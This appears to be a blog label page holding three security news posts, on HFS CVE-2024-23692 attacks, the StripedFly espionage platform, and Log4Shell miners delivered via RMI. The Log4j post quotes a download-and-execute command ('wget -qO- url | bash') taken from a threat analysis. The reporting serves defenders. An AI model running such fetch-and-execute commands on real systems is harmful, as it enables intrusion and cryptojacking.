Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Monero Miner. Show all posts

Hackers Attack HFS Servers to Install Malware and Mine Monero


 

Cybersecurity researchers have identified a wave of attacks targeting outdated versions of the HTTP File Server (HFS) software from Rejetto, aiming to distribute malware and cryptocurrency mining tools. These attacks exploit a critical security flaw known as CVE-2024-23692, which allows hackers to execute arbitrary commands without needing authentication.

CVE-2024-23692 is a high-severity vulnerability discovered by security researcher Arseniy Sharoglazov. It was publicly disclosed in May this year, following a detailed technical report. The flaw is a template injection vulnerability that enables remote attackers to send specially crafted HTTP requests to execute commands on the affected systems. The vulnerability affects HFS versions up to and including 2.3m. In response, Rejetto has issued a warning to users, advising against the use of these versions due to their susceptibility to control by attackers.

Researchers at AhnLab Security Intelligence Center (ASEC) have observed multiple attacks on version 2.3m of HFS. This version remains popular among individuals, small teams, educational institutions, and developers for network file sharing. The attacks likely began after the release of Metasploit modules and proof-of-concept exploits soon after the vulnerability's disclosure.

During these attacks, hackers gather information about the compromised system, install backdoors, and deploy various types of malware. Commands such as "whoami" and "arp" are executed to collect system and user information and identify connected devices. Hackers also add new users to the administrators' group and terminate the HFS process to prevent other threat actors from exploiting the same vulnerability.

In several cases, the XMRig tool, used for mining Monero cryptocurrency, was installed. ASEC researchers attribute one of these attacks to the LemonDuck threat group. Other malware payloads deployed include:

1. XenoRAT: A tool for remote access and control, often used alongside XMRig.

2. Gh0stRAT: Used for remote control and data exfiltration.

3. PlugX: A backdoor associated with Chinese-speaking threat actors, providing persistent access.

4. GoThief: An information stealer that uses Amazon AWS for data exfiltration, capturing screenshots, collecting desktop file information, and sending data to an external command and control server.

AhnLab continues to detect attacks on HFS version 2.3m. Given that the server must be online for file sharing, it remains a lucrative target for hackers. Rejetto recommends users switch to version 0.52.x, which is the latest release despite its lower version number. This version is web-based, requires minimal configuration, and supports HTTPS, dynamic DNS, and administrative panel authentication.

The company has also provided indicators of compromise, including malware hashes, IP addresses of command and control servers, and download URLs for the malware used in these attacks. Users are urged to update their software to the latest version and follow cybersecurity best practices to protect their systems from such vulnerabilities.

By assimilating and addressing these vulnerabilities, users can better secure their systems against these sophisticated attacks.


StripedFly: Cryptomining Tool Infects 1 Million Targets Worldwide


Security firm Kaspersky Lab has revealed that a cryptominer, which never really generated a hefty crypto amount for its operators, is now a part of a bigger digital espionage campaign. Since 2017, the platform, known as StripedFly, has infected over a million Windows and Linux targets worldwide. StripedFly was most likely developed as a component of a well-funded state espionage program rather than a cybercriminal operation because it is modular and has several components for infiltrating targets' devices and gathering various types of data. Additionally, it has an update system that allows attackers to add new features and upgrades to the malware. 

Among other malware, StripedFly can steal access credentials from targeted systems, and take capture screenshots, obtain databases, private files, movies, or other relevant data, and record audio in real time by breaking into a target's microphone. Interestingly, StripedFly conceals communication and exfiltration between the malware and its command-and-control servers using a novel, proprietary Tor client. 

Additionally, there is a ransomware component that has occasionally been used by attackers. Using a modified version of the infamous EternalBlue exploit that was published by the US National Security Agency, it first infects targets.

While StripFly can steal Monera cryptocurrency, that is only a portion of what it is capable of. The researchers found this out last year and thoroughly examined it before making their results public.

Kaspersky researchers Sergey Belov, Vilen Kamalov, and Sergey Lozhkin wrote in the post, "What we discovered was completely unexpected; the cryptocurrency miner was just one component of a much larger entity."

According to the researchers, the platform is essentially "a hallmark of APT malware" since it has update and delivery capabilities via reliable services like Bitbucket, GitHub, and GitLab—all of which use specially encrypted archives—as well as an integrated Tor network tunnel for communication with command-and-control (C2) servers./ The researchers further notes that discovering the breadth of StripedFly is ‘astonishing,’ taking into account its successful evasion from getting detected in six years. 

How Does StripedFly Operates? 

The main structural component of the malware is a monolithic binary code that could be expanded by the attackers through different pluggable modules. Every module, whether for added functionality or to offer a service, is in charge of setting up and maintaining its own callback function in order to communicate with a C2 server.

The platform initially emerges on a network as a PowerShell that seems to leverage a server message block (SMB) attack, which looks to be a modified variant of EternalBlue. EternalBlue was first discovered in April 2017 and is still a danger to unpatched Windows systems.

Depending on the availability of its PowerShell interpreter and certain privileges made available in the process, the malware uses a variety of methods for persistence. The researchers notes that, "typically, the malware would be running with administrative privileges when installed via the exploit, and with user-level privileges when delivered via the Cygwin SSH server," the researchers wrote.

The functionality modules are wide and varied, giving attackers a range of options that enable them to continuously monitor a victim's network activity. The modules include the Monero cryptominer mentioned earlier, as well as a variety of command handlers, a credential harvester, repeatable tasks that can record microphone input, take screenshots, and carry out other tasks on a scheduled basis, a reconnaissance module that gathers a lot of system data, and SMBv1 and SSH infectors for worming and penetration capabilities.

Log4j Attackers Switch to Injecting Monero Miners via RMI

 

The most significant vulnerability identified recently has dominated the news over the last few days. The vulnerability, Log4Shell or LogJam and officially termed CVE-2021-44228, is an unauthenticated RCE flaw that permits total system control on systems running Log4j 2.0-beta9 through 2.14.1. 

As per BleepingComputer, some threat actors using the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI, or even merged the two in a single request, to boost their chances of success. This is a big step forward in the ongoing attack, and firms should be aware of it as they try to secure all possible channels. 

For the time being, threat actors attempting to steal resources for Monero mining have identified this trend, but others may follow suit at any time. The majority of attacks targeting the Log4j "Log4Shell" vulnerability have used the LDAP (Lightweight Directory Access Protocol) service. 

Switching to the RMI (Remote Method Invocation) API may appear counter-intuitive at first sight, given that this technique is subject to additional checks and limitations. 

However, this is not always the case, and if we consider that some JVM (Java Virtual Machine) versions may not have strict rules, RMI may be a more easy way to do RCE (remote code execution) than LDAP. Furthermore, LDAP queries have become a well-established part of the infection chain, and defenders are keeping a close eye on them. Many IDS/IPS solutions, for example, currently filter requests using JNDI and LDAP, thus RMI may be disregarded for the time being. In some cases, Juniper recognised both RMI and LDAP services in the same HTTP POST request. 

As per the source, “This code invokes a bash shell command via the JavaScript scripting engine, using the construction “$@|bash” to execute the downloaded script. During the execution of this command, the bash shell will pipe the attacker’s commands to another bash process: “wget -qO- url | bash”, which downloads and executes a shell script on the target machine."

"This obfuscated script downloads a randomly named file of the form n.png, where n is a number between 0 and 7. Despite the purported file extension, this is actually a Monero cryptominer binary compiled for x84_64 Linux targets. The full script also adds persistence via the cron subsystem."

"A different attack, also detected by Juniper Threat Labs, tries both RMI and LDAP services in the same HTTP POST request in hopes that at least one will work. The LDAP injection string is sent as part of the POST command body. An exploit string in the POST body which is unlikely to succeed given most applications do not log the post body, which can be binary or very large, but by tagging the string as “username” in the JSON body, the attackers hope to exploit applications that will treat this request as a login attempt and log the failure."

Threat actors appear to be interested in mining Monero on hacked devices and promote it as an apparently innocent activity that "ain't going to hurt anyone else." The miner is built for x86 64 Linux systems and uses the cron subsystem for persistence. Even though the majority of attacks have targeted Linux systems. 

CheckPoint states to have discovered the first Win32 program to use Log4Shell, called 'StealthLoader.' by its investigators. 

The only way to combat what has become one of the most serious vulnerabilities in recent history is to upgrade Log4j to version 2.16.0. Administrators should also keep an eye on Apache's security area for new version announcements and execute them as soon as possible.